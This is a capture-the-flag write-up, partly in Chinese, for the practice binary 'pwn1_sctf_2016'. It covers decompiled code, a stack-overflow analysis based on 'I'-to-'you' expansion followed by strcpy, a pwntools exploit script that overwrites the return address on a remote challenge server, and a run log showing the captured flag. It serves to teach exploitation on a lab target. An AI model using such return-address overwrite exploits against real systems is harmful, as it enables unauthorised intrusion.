BUU-4-pwn1_sctf_2016
lxl@lxl-vm:~/BUU/pwn1_sctf_20161$ file pwn1_sctf_2016 pwn1_sctf_2016: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4b1df4d30f1d6b75666c64bed078473a4ad8e799, not stripped
Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)
IDA 32
// Decompiled (IDA) entry point. The program does nothing except call
// vuln(); argc/argv/envp are the decompiler's standard parameter names
// and none of them is used.
int __cdecl main(int argc, const char **argv, const char **envp)
{
    vuln();
    return 0;
}
// Decompiled (IDA) body of the vulnerable routine.
// The per-variable comments are the decompiler's stack offsets. `s` is
// shown as a single char but is used as the input buffer: fgets writes up
// to 32 bytes into it and it sits 0x3C (60) bytes below the saved ebp, so
// the return address starts 0x3C + 4 bytes after its start.
int vuln()
{
    const char *v0; // eax
    char s;  // [esp+1Ch] [ebp-3Ch]  -- input buffer, 60 bytes up to the saved ebp
    char v3; // [esp+3Ch] [ebp-1Ch]  -- std::string temporary (result of replace)
    char v4; // [esp+40h] [ebp-18h]  -- std::string "you"
    char v5; // [esp+47h] [ebp-11h]  -- allocator for v4
    char v6; // [esp+48h] [ebp-10h]  -- std::string "I"
    char v7; // [esp+4Fh] [ebp-9h]   -- allocator for v6
    printf("Tell me something about yourself: ");
    // Bounded read: at most 32 bytes including the terminating NUL, so this
    // call by itself cannot run past `s`. `edata` is the decompiler's label
    // for the stream argument -- presumably stdin, verify in the disassembly.
    fgets(&s, 32, edata);
    std::string::operator=(&input, &s);
    // Construct the two std::string temporaries "you" and "I"; the
    // decompiler shows the allocator and constructor calls explicitly.
    std::allocator<char>::allocator(&v5);
    std::string::string(&v4, "you", &v5);
    std::allocator<char>::allocator(&v7);
    std::string::string(&v6, "I", &v7);
    // replace(): per the write-up every 'I' in `input` becomes "you", so the
    // string can grow to three times the length that fgets allowed.
    replace((std::string *)&v3);
    // NOTE(review): the four-argument form does not match std::string's
    // operator= -- likely a mis-resolved call in the decompiler output, so
    // the argument list as shown should not be read literally.
    std::string::operator=(&input, &v3, &v6, &v4);
    std::string::~string((std::string *)&v3);
    std::string::~string((std::string *)&v6);
    std::allocator<char>::~allocator(&v7);
    std::string::~string((std::string *)&v4);
    std::allocator<char>::~allocator(&v5);
    v0 = (const char *)std::string::c_str((std::string *)&input);
    // Unbounded copy of the expanded string back into the 60-byte stack
    // buffer: this is the overflow. A 32-byte read can become up to 96 bytes
    // after replacement, running past `s`, the saved ebp and into the return
    // address, and the binary has no stack canary (see checksec output above)
    // to catch it. A length-limited copy (or printing the std::string
    // directly instead of copying it back into `s`) would close the bug.
    strcpy(&s, v0);
    return printf("So, %s\n", &s);
}
程序将输入中的 'I' 替换为 "you"，然后输出 "So, %s"。
fgets 处限制了读入 s 的长度（最多 32 字节），这一步本身不会溢出。但 strcpy 未对写入 s 的长度做任何限制：v0 是把输入中的 'I' 替换为 "you" 之后的结果，其长度 = 'I' 的个数 × 3。
输入的 I 最多 32 个，v0 最长为 32*3=96，远大于 0x3C（s 的长度 = 60 字节），因此可以溢出。覆盖到返回地址之前需要填充 0x3C+4 = 64 字节，即 21 个 'I'（替换后为 63 字节）+ 1 个 'A'。
EXP
# Exploit script from the write-up. Written for Python 2 pwntools: p32()
# returns bytes, so the str + bytes concatenation below only works under
# Python 2 str semantics.
from pwn import *

# Remote challenge instance. The port here differs from the one in the run
# log below, presumably because it is assigned per instance.
p = remote('node3.buuoj.cn',27033)
# Address taken from the binary (No PIE, see checksec output above); the
# write-up names it after the function it points at.
catflag_address = 0x08048F0D
# 21 'I' -> 21 * "you" = 63 bytes after replace(), plus 'A' = 64 bytes =
# 0x3C (buffer `s`) + 4 (saved ebp); the following 4 bytes land on the
# saved return address.
payload = 21*'I'+'A'+ p32(catflag_address)
p.sendline(payload)
p.interactive()
lxl@lxl-vm:~/BUU/pwn1_sctf_20161$ python sctf.py [+] Opening connection to node3.buuoj.cn on port 28772: Done [*] Switching to interactive mode flag{a042f209-9e11-431f-9ef3-4431a390ae6c} timeout: the monitored command dumped core [*] Got EOF while reading in interactive $
flag{a042f209-9e11-431f-9ef3-4431a390ae6c}